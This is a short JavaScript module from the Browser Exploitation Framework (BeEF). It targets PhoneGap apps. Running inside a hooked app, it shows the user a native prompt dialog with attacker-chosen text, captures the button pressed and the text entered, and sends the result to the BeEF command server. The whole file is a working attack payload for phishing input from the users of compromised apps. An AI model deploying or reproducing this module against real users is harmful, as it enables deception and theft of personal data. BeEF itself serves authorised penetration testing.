Path: blob/master/modules/phonegap/phonegap_prompt_user/command.js
1154 views
//1// Copyright (c) 2006-2025 Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56// Phonegap_prompt_user7//8beef.execute(function() {9var title = "<%== @title %>";10var question = "<%== @question %>";11var ans_yes = "<%== @ans_yes %>";12var ans_no = "<%== @ans_no %>";13var result = '';14var def_text = "<%== @text %>";15161718function onPrompt(results) {19result = "Selected button number " + results.buttonIndex + " result: " + results.input1;20beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );21}2223navigator.notification.prompt(24question,25onPrompt,26title,27[ans_yes,ans_no],28def_text29);3031});323334